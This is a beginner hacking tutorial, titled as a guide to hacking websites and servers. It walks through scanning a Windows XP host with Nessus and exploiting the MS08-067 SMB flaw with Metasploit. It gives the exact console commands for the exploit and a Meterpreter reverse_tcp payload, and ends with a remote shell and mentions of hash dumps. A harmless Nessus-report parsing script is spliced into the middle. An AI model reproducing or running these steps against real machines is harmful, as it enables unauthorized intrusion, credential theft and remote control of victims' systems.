I will tell you how to find vulnerabilities on any website or server using Nessus, and how to exploit them using Metasploit (MSF).
For this purpose I have used two systems connected via WAN. The host OS does not matter; the victim has Windows XP installed.
Basic commands to be known:
1. search for anything: search <name>
2. select an exploit: use <exploit_name>
3. set the payload: set payload <payload_name>
4. see info: info <name>
STEP 1:
First, instead of using nmap for port scanning, we have used Nessus for vulnerability scanning. Nessus has one more advantage: it gives each vulnerability an identifier, which helps when searching MSF for the proper exploit.
So first we will scan the target.
[Screenshot: Nessus scan results]
In the above scan you can see how good Nessus is at reporting the severity level of each vulnerability. After analysing the report, we see 5 high vulnerabilities; clicking on the first one, let's see its details:
[Screenshot: vulnerability details]
We can see a lot of information about the vulnerability. The vulnerability here is a service flaw on port 445 which has been given the number MS08-067; this number is going to be of great help later.
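The identifier Nessus attaches to each finding is also what a defender uses to prioritise patching. The following Python script, added here as an example (it is not part of the original tutorial), parses a Nessus v2 XML export, keeps findings at or above a chosen severity and pulls out the Microsoft bulletin ID from the <msft> element. The embedded report is constructed sample data: the host, plugin IDs and names are placeholders, and only the MS08-067 finding on port 445 mirrors the one in Step 1.

```python
# Triage a Nessus v2 XML (.nessus) export: list findings at or above a
# severity threshold with the Microsoft bulletin ID Nessus attached to them.
import xml.etree.ElementTree as ET

# Constructed sample report, not real scan output. Host, ports, plugin IDs
# and plugin names are placeholders; the MS08-067 finding on port 445
# mirrors the one discussed in Step 1.
SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.168.1.5">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="11111" pluginName="MS08-067: Server Service RCE">
        <msft>MS08-067</msft>
      </ReportItem>
      <ReportItem port="139" svc_name="smb" protocol="tcp" severity="1"
                  pluginID="22222" pluginName="SMB Signing Not Required">
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

SEVERITY_NAMES = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}

def parse_findings(xml_text, min_severity=3):
    """Return findings with severity >= min_severity, most severe first.
    Each finding records host, port, severity, plugin name and the Microsoft
    bulletin ID (None when Nessus attached no <msft> element)."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            level = int(item.get("severity", "0"))
            if level < min_severity:
                continue  # below the threshold the caller cares about
            msft = item.findtext("msft")
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "level": level,
                "severity": SEVERITY_NAMES.get(level, str(level)),
                "plugin": item.get("pluginName"),
                "bulletin": msft.strip() if msft else None,
            })
    findings.sort(key=lambda f: (-f["level"], f["host"], f["port"]))
    return findings
```

Running parse_findings(SAMPLE_NESSUS) on the sample returns only the port 445 finding, tagged MS08-067; lowering min_severity to 1 adds the SMB signing finding with bulletin None.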
STEP 2:
In MSF we are going to search for the proper exploit for this vulnerability. To make our search easier we type search <number>, and what we get is the exact name of the exploit. In other cases, where you don't know the number or ID, you can also search by other parameters such as the name (e.g. search <name>); then you have to choose the best one among the results by comparing all their requirements and how they work.
[Screenshot: MSF search results]
Now, since we have got the exact exploit, we are going to use it. The command for this:
use <exploit name>, e.g. use windows/smb/ms08_067_netapi
We will check the various parameters by typing: info windows/smb/ms08_067_netapi
STEP 3:
Now it's time to set the victim's IP address, i.e. RHOST. RPORT is already set to 445.
Command to set RHOST: setg RHOST 192.168.1.5
Note: 192.168.1.5 is the IP address of my PC on the local network, which I am going to attack.
STEP 4:
After setting the exploit, now it's time to set the payload, so the main question arises: which payload to use?
The options for this question can be narrowed down by typing show payloads, which gives the list of payloads that are compatible with that exploit.
From that list we can select any payload; I prefer meterpreter/reverse_tcp.
To use this payload, type the command: set payload windows/meterpreter/reverse_tcp
Then I will check its parameters, i.e. LHOST, LPORT, etc. To check them we type: info windows/meterpreter/reverse_tcp
Here we have to change LHOST. LHOST refers to the IP address of the attacker, i.e. mine.
So to set LHOST we do: setg LHOST 192.168.1.10
[Screenshot: payload options]
All done, we are now ready to exploit.
STEP 5:
Finally we type exploit, and voila: the attack is successful and a session is created.
[Screenshot: meterpreter session]
Now what? Just type the command help and you will get a list of commands such as killing a process, shutdown and hash dumps, but I like shell because it gives you full command-line control of the system, which you can see in the above picture.
NOTE:
1. This tutorial is for learning purposes only; the author is not responsible for any illegal use.
2. Any use of this tutorial is at your own risk.
3. This tutorial is not written by me.
Hack Websites & Servers Using Nessus & Metasploit: Step by Step Tutorial for Beginners